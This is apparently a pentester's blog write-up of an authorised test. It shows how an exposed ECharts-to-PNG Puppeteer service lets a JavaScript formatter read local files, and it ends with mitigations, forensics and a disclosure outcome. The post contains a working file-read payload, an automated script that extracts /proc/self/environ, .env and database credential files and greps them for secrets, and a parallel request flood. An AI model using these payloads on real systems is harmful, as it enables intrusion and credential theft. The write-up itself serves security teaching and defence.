DEV Community

Cover image for From a Single IP to Exfiltrated Passwords in a PNG: My First Freelance Pentest Engagement
Marco Altomare
Marco Altomare

Posted on

From a Single IP to Exfiltrated Passwords in a PNG: My First Freelance Pentest Engagement

Disclaimer: This article describes a security research activity carried out in a controlled context, with educational goals and the aim of improving security. All references to IPs, domains, paths, file names, and configurations have been anonymized or modified to prevent any form of harm or unauthorized enablement. Nothing below is an invitation to test systems without a written mandate from the owner or legal responsible party.

A real, anonymized case: from PoC to local file reading, ending with a report a CTO can actually use.

My first freelance penetration testing engagement came in a very concrete way: a technical contact asked me to verify a Linux server exposed on the internet, with a custom web application already in production and some collateral services publicly accessible. This was not the classic setting of a large structured program: it was a real system to assess, a tight perimeter, and a simple but demanding request — understand how exposed it really was.

It was immediately clear to me that this was not a theoretical exercise. There was a real infrastructure, a precise objective, and the responsibility to turn technical observations into results that would actually be useful to the people running that system.

In this article I focus on the most interesting part: how a seemingly small surface can lead to a much deeper discovery chain, and why some exploits stand out not only because of their impact, but because of their technical elegance.

For me, this was a real exam. No company badge, no senior colleague to pass doubts to. Just the mandate, the objectives, the tools I use every day, and the responsibility to deliver solid results to a real client.

In this article I explain what I found from a technical perspective and what I learned from a professional one. It is a showcase of how I approach a black-box test, from the first packet to the final report.

The perimeter: one server, many surfaces

The target was a single Linux host with a public IP in the form of XXX.XXX.XXX.XXX and an application domain I will call api.example.com. The environment was not spread across multiple machines or microservices, but concentrated on a single instance with several services listening.

From the reconnaissance phase, the main exposed surfaces were:

  • Port 80 and 443: a public PHP API based on a custom framework.
  • Port 3001: a Node.js service that generates chart images from ECharts configurations.
  • Port 8999: an XHProf interface, a PHP profiler, reachable from the outside without authentication.

The stack consisted of Nginx as reverse proxy, a PHP web application, a Node.js service orchestrating Puppeteer, and a MySQL backend. The main webroot had the classic shared-hosting structure, similar to /data/wwwroot/, with separate directories for the PHP API and the chart-generation service.

Even from this point there were some interesting signals: an exposed profiler, a Node service rendering user input through a headless browser, and a custom PHP framework. These are three ingredients that, if combined poorly, can lead to deep vulnerabilities.

Mapping the attack surface in practice

The first phase was mapping: understanding what responded on each port, which endpoints existed, and what kind of input they accepted.

On the PHP API, the application responded in JSON even for nonexistent routes. The custom framework used a central router that, for unregistered paths, returned a standard message like:

{"code": 99, "msg": "route not exists"} 
Enter fullscreen mode Exit fullscreen mode

This made errors less informative, but it was enough to understand that I was not dealing with a mainstream framework like Laravel or Symfony.

The most interesting port was 3001. There lived a Node.js service exposing three main endpoints:

  • POST /api/generate-chart
  • GET /api/health
  • GET /images/:filename

The behavior was clear:

  • POST /api/generate-chart accepted an ECharts JSON object, passed it to Puppeteer, and returned a PNG.
  • GET /api/health confirmed the service status with a lightweight response.
  • GET /images/:filename exposed the generated PNGs, saved on disk in a dedicated directory.

On port 8999, XHProf was exposed. A legitimate tool for profiling PHP applications, but one that is meant for internal environments, not the public internet.

From XHProf I was able to extract valuable information:

  • internal class names such as MysqlHelper, GlobalVar, FuncHelper.
  • use of KLogger for application logging.
  • filesystem directory structure, including paths under the webroot.
  • internal PHP application route patterns.

In practice, XHProf acted as involuntary technical documentation for the backend.

The chart-generation API: Puppeteer as a pivot

The service on port 3001 took as input an ECharts option object and rendered it through a headless Chromium instance managed by Puppeteer.

The idea is simple and useful: instead of generating charts on the client side in the user’s browser, the application generates them server-side and returns a PNG image that can be embedded anywhere.

At a high level, the flow was:

  • The client sends a POST /api/generate-chart request with a JSON payload containing the ECharts configuration.
  • Node.js creates a headless page with Puppeteer.
  • The page loads ECharts, applies the received options, and renders the chart.
  • Puppeteer captures a screenshot of the chart area and saves it as a PNG in a local directory.
  • The API returns the file path and a fileName that can be downloaded through GET /images/:filename.

Functionally, it is a perfect service for automatic report generation. From a security perspective, however, everything depends on what is allowed inside the ECharts code.

And that is where the interesting part begins.

From the ECharts formatter to local file reading

In ECharts configuration, the label.formatter field can accept a JavaScript function, not just a string.

Normally this function is used to customize series labels, adding percentages, symbols, or special formatting. In the context of a headless browser running server-side, with the file:// protocol available, that function becomes a small sandbox escape point.

The core of the vulnerability I found is this:

  • the service accepts arbitrary JavaScript functions in option.series[].label.formatter
  • Puppeteer executes them in the page context, without limiting access to the file:// protocol
  • the JavaScript code can instantiate objects such as XMLHttpRequest and read local files
  • the text read can be returned by the formatter function and thus rendered inside the chart
  • all generated content is captured in the PNG and served over HTTP via /images/:filename

This leads to a vulnerability that can be described as file:// SSRF with arbitrary local file reading, combined with path traversal.

The proof of concept I used to confirm the exploit, properly anonymized, looks like this:

curl -s -X POST [http://XXX.XXX.XXX.XXX:3001/api/generate-chart](http://XXX.XXX.XXX.XXX:3001/api/generate-chart) \
  -H "Content-Type: application/json" \
  -d '{
    "option": {
      "title": {"text": "FILE_READ_POC"},
      "series": [{
        "type": "pie",
        "data": [{"value": 1, "name": "leak"}],
        "label": {
          "show": true,
          "formatter": "function(p){ var x=new XMLHttpRequest(); x.open(\\\"GET\\\",\\\"file:///etc/passwd\\\",false); x.send(); return x.responseText.substring(0,500); }"
        }
      }]
    }
  }' 
Enter fullscreen mode Exit fullscreen mode

The API response confirms the PNG generation and provides the file name:

{
  "success": true,
  "imagePath": "data/wwwroot/echarts-to-image/images/chart-UUID.png",
  "imageUrl": "images/chart-UUID.png",
  "fileName": "chart-UUID.png"
} 
Enter fullscreen mode Exit fullscreen mode

By downloading the PNG with:

curl -s [http://XXX.XXX.XXX.XXX:3001/images/chart-UUID.png](http://XXX.XXX.XXX.XXX:3001/images/chart-UUID.png) -o out.png
strings out.png | head 
Enter fullscreen mode Exit fullscreen mode

...it is possible to see the contents of /etc/passwd rendered as text inside the image.

From there, the vulnerability becomes a true arbitrary local file read with the privileges of the Node.js process.

In terms of severity, a combination of file-based SSRF and unauthenticated arbitrary file reading on an exposed service deserves a high classification. The estimated CVSS score was 8.6 High.

Reconstructing the filesystem from scratch

By combining the information obtained from XHProf with file reading via Puppeteer, I was able to reconstruct the filesystem structure in a fairly detailed way.

A simplified representation, with anonymized names, is the following:

/
├── etc/
│   ├── passwd                    # system user enumeration
│   └── environment               # system environment variables
├── proc/
│   ├── self/environ              # Node.js process env
│   └── self/cmdline              # process startup command
├── root/
│   ├── flag.txt                  # CTF flag or sentinel file
│   └── flag                      # variant of the same flag
├── tmp/                          # temporary files, possible sessions
├── var/
│   └── log/
│       └── nginx/                # access.log, error.log
└── data/
    └── wwwroot/
        ├── echarts-to-image/     # vulnerable Node.js service
        │   ├── app.js            # Node.js source code
        │   ├── index.js
        │   ├── package.json
        │   ├── .env              # specific environment variables
        │   └── images/           # PNGs generated and accessible via HTTP
        └── api-php/              # main PHP application
            ├── index.php
            ├── config/
            │   └── database.php  # MySQL credentials
            ├── framework/
            │   ├── core/
            │   │   ├── Route.php
            │   │   ├── BaseApi.php
            │   │   └── GlobalVar.php
            │   └── libs/
            │       ├── MysqlHelper.php
            │       └── FuncHelper.php
            ├── Lists.php
            ├── .env              # PHP application secrets
            └── runtime/          # KLogger application logs 
Enter fullscreen mode Exit fullscreen mode

For a black-box test, reaching a map like this from the internet alone means you already have rich material for a high-value report. Not only as a personal challenge, but also as a concrete basis for discussion with the client.

Automating exfiltration: the read script

Once I had proved that reading /etc/passwd was possible, the challenge became organizational. It made no sense to repeat the same request manually for every single file.

I therefore prepared a collection script that, starting from a list of interesting paths, sends the request to the generate-chart endpoint, retrieves the generated PNG, and runs strings to quickly extract any secrets.

A simplified, anonymized version of the script is this:

BASE_URL="http://XXX.XXX.XXX.XXX:3001"
OUT_DIR="/tmp/loot"
mkdir -p "$OUT_DIR"

read_file() {
  local target="$1"
  local label="${target//\//_}"

  fname=$(curl -s -X POST "$BASE_URL/api/generate-chart" \
    -H "Content-Type: application/json" \
    -d "{
      \"option\": {
        \"title\": {\"text\": \"LEAK\", \"fontSize\": 12},
        \"series\": [{
          \"type\": \"pie\",
          \"data\": [{\"value\": 1, \"name\": \"x\"}],
          \"label\": {
            \"show\": true,
            \"formatter\": \"function(p){ var x=new XMLHttpRequest(); x.open('GET','file://$target',false); x.send(); return (x.responseText||'EMPTY_OR_NOT_FOUND').substring(0,800); }\"
          }
        }]
      }
    }" | grep -o '\"fileName\":\"[^\"]*\"' | cut -d'\"' -f4)

  if [[ -n "$fname" ]]; then
    curl -s "$BASE_URL/images/$fname" -o "$OUT_DIR/$label.png"
    echo "[+] $target -> $OUT_DIR/$label.png"
    strings "$OUT_DIR/$label.png" | grep -iE \
      "password|secret|key|token|api|mysql|db_|flag|ctf|\\{[a-zA-Z0-9_]+\\}"
  else
    echo "[!] Nessun PNG generato per $target"
  fi
  sleep 1
}

# Target critici
read_file "/proc/self/environ"
read_file "/data/wwwroot/api-php/config/database.php"
read_file "/data/wwwroot/echarts-to-image/app.js"

# Target ad alta priorità
read_file "/data/wwwroot/echarts-to-image/.env"
read_file "/data/wwwroot/api-php/.env"
read_file "/root/flag.txt"
read_file "/root/flag"
read_file "/flag.txt"
read_file "/flag"

# Possibili nomi alternativi per la flag
for name in secret secret.txt password root.txt token.txt answer.txt hidden.txt; do
  read_file "/root/$name"
  read_file "/$name"
done

# Log e informazioni di sistema
read_file "/var/log/nginx/access.log"
read_file "/etc/passwd"
read_file "/proc/self/cmdline"

echo "Tutti i PNG sono in $OUT_DIR"
echo "Analisi rapida: strings $OUT_DIR/*.png | grep -iE 'flag|pass|key|secret'" 
Enter fullscreen mode Exit fullscreen mode

This script has three qualities that, as a freelancer, matter a lot to me:

  • it is repeatable and documentable
  • it reduces room for human error
  • it shows the client clearly that the exploit is real and industrializable

Hunting hard-coded secrets

The files of interest fell into three categories:

  • system files with informational value, such as /etc/passwd or /proc/self/cmdline
  • critical application files, such as database.php, .env, app.js
  • possible flag or sentinel files in /root or at the filesystem root

In particular, some key targets were:

  • /proc/self/environ: the Node.js process environment, with possible credentials or runtime-injected tokens
  • /data/wwwroot/api-php/config/database.php: plaintext MySQL credentials, often reused
  • /data/wwwroot/echarts-to-image/app.js: Node.js service source code, possibly with hard-coded keys
  • .env for both the Node.js service and the PHP application
  • various files under /root and /, with standard or slightly oblique names

No particularly severe hard-coded secrets emerged from the PHP and Node.js code, but the combination of readable files and .env files accessible via SSRF still represented a serious risk.

Forensics: what traces the attack leaves

A part that often gets sidelined in pentest writeups is forensics. Here, I wanted to make it explicit because it is essential for the client to understand what remains in the logs after an attack of this kind, and for the professional it is important to leave a clean environment after a penetration test.

The main activities left traces like these:

  • POST /api/generate-chart and GET /images/... requests ended up in Nginx access.log.
  • Accesses to the XHProf interface were also present in the HTTP logs.
  • Path traversal attempts against the images directory generated errors in error.log.
  • Generated PNGs were physically saved in a dedicated directory, accumulating artifacts on disk.

A hypothetical list of relevant logs, in a similar environment, would be:

/var/log/nginx/access.log           # HTTP requests, including SSRF payloads
/var/log/nginx/error.log            # errors, path traversal, stacktrace
/data/wwwroot/api-php/runtime/      # PHP application logs (KLogger)
/var/log/secure or /var/log/auth.log # SSH access and privilege elevation
/var/log/messages                   # generic system logs
/var/log/wtmp, /var/log/btmp        # login history and failed attempts 
Enter fullscreen mode Exit fullscreen mode

A defender who wants to check for abuse of the vulnerability can start with commands like:

# requests to the chart generation endpoint
grep "generate-chart" /var/log/nginx/access.log

# access to the XHProf interface on the dedicated port
grep "8999" /var/log/nginx/access.log

# path traversal attempts in images
grep "images/../" /var/log/nginx/access.log

# IPs with abnormal request volume
awk '{print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head -20 
Enter fullscreen mode Exit fullscreen mode

On my side, in the report I explicitly documented which artifacts the activity left:

  • PNG files under the image directory of the chart-generation service
  • lines in Nginx access.log with requests to /api/generate-chart and /images/...
  • no changes to configurations or files outside the service output directory

This is a point I care about a lot as a freelancer: showing not only what is vulnerable, but also how clean and controlled my activity was.

Health check flood and service recovery

During the tests I also ran into a side issue: a particularly heavy payload had caused the Puppeteer worker to get stuck.

The /api/health endpoint continued to respond, but requests to /api/generate-chart timed out, which suggested that something in the worker was hanging.

In a real environment, this kind of situation can happen with a clumsy attacker or an overly aggressive tester. The practical question becomes: how do you recover the service without direct access to the process?

In this scenario, a controlled health-check flood was enough to force recovery.

The command used was similar to this:

for i in $(seq 1 50); do
  curl -s --max-time 2 [http://XXX.XXX.XXX.XXX:3001/api/health](http://XXX.XXX.XXX.XXX:3001/api/health) &
done
wait 
Enter fullscreen mode Exit fullscreen mode

Fifty parallel requests to the health-check endpoint created enough pressure on Node.js’s event loop to force the process to actively handle the backlog.

The observed result was telling:

  • most /api/health requests succeeded
  • some timed out due to temporary saturation
  • after the flood, the chart-generation endpoint started completing requests again

For the defender, this highlights several design issues:

  • no rate limiting on the health check
  • no isolation of Puppeteer workers
  • dependence on a single Node.js process without strong memory-based auto-restart mechanisms

The mitigation I recommended in the report was to use PM2 or an equivalent setup, with max_memory_restart, multiple instances, cluster mode, and a simple rate limiter on /api/health.

Technical recommendations to the client

The core job of a freelance pentester is not to stop at the exploit. It is to translate findings into concrete actions for the client.

The main technical recommendations I proposed were:

  • drastically limit what the ECharts formatter can execute, avoiding arbitrary input functions
  • block the file:// protocol in the Puppeteer rendering context, using launch options and code-level controls
  • make the XHProf interface private or remove it entirely from exposed environments
  • introduce authentication and authorization on chart-generation APIs to prevent unauthenticated abuse
  • move .env files and sensitive configurations outside the webroot and protect them at the web server level
  • use a secrets management system (Vault, Key Vault, and similar) instead of readable files on disk
  • configure rate limiting and circuit breakers on sensitive endpoints, including health checks

With the client, we also discussed priorities. First, mitigate the vulnerabilities that allow remote reading of configuration files and secrets; then address the “bonus” surfaces like XHProf; and finally work on service resilience, for example with better Puppeteer worker management.

What I learned as a freelance pentester

From a technical point of view, this work allowed me to put several skills into practice:

  • identifying and exploiting an SSRF + file-read chain in a nonstandard context
  • using profiling tools exposed to the internet (XHProf) as intelligence sources, not just as curiosities
  • automating file exfiltration with a script that is robust, maintainable, and extensible
  • connecting application vulnerabilities to concrete impact on configuration, logs, and operational management

From a professional point of view, I took away a few important lessons.

The first is that careful documentation makes a difference. It is one thing to say “there is an SSRF.” It is another to guide the client through the entire path: from the JSON input, to the generated chart, to the PNG containing the contents of a system file.

The second is that, as a freelancer, you cannot afford to be only “the technical person.” You have to explain what you are doing, why you are doing it, and what the impact is, speaking the language of the people holding budgets and priorities. The report is not a bureaucratic attachment; it is the tool that turns an exploit into a security decision.

The third is that a good pentest does not stop at the single vulnerability. Highlighting aspects like available logs, the traces left behind, and recovery options shows the client that you are thinking about the full incident lifecycle, not just the spectacular part.

For me, this first freelance engagement was a real test of all of that. On the exploit side, I confirmed the ability to read arbitrary files on the server through Puppeteer and ECharts, reconstructed the filesystem in a meaningful way, and identified sensitive files that needed protection. On the professional side, I learned how to turn that analysis into a coherent technical story, usable by the client to make decisions.

Final disclaimer: the techniques described in this article were applied exclusively in an authorized and controlled context, against systems for which there was explicit testing authorization. Never test services or infrastructure without the consent of the owner or legal responsible party.

After documenting this vulnerability, I followed responsible disclosure practices and reported the issue privately to the Apache Software Foundation Security Team.

The ASF Security Team reviewed my report and responded promptly. They directed me to the official ECharts security guidelines, - https://echarts.apache.org/handbook/en/best-practices/security/ - which explicitly state that ECharts treats inputs like label.formatter as trusted code, and that input sanitization is the responsibility of the application developer — not of ECharts itself.

I reviewed the documentation and agree with their assessment. This is not a vulnerability in Apache ECharts. It is an application-level misconfiguration: a developer accepting untrusted user input and passing it directly to ECharts without sanitization, in a server-side rendering context where a headless browser executes it with access to the local filesystem.
The takeaway for developers is clear: if you build a service that accepts ECharts configuration from external users and renders it server-side via Puppeteer or any headless browser, you must treat formatter fields — and all function-type inputs — as untrusted and potentially dangerous. Sanitize, reject, or allowlist them before they ever reach the renderer.
The vulnerability is real. The attack works. The fix is on you.

-

_© 2026 Marco Altomare. All rights reserved.

Analysis, texts, technical reconstructions, scripts, and original materials contained in this article belong to the author, unless otherwise indicated. Citation is allowed with proper attribution. Republishing, adapting, or commercial use requires prior written authorization._

Top comments (0)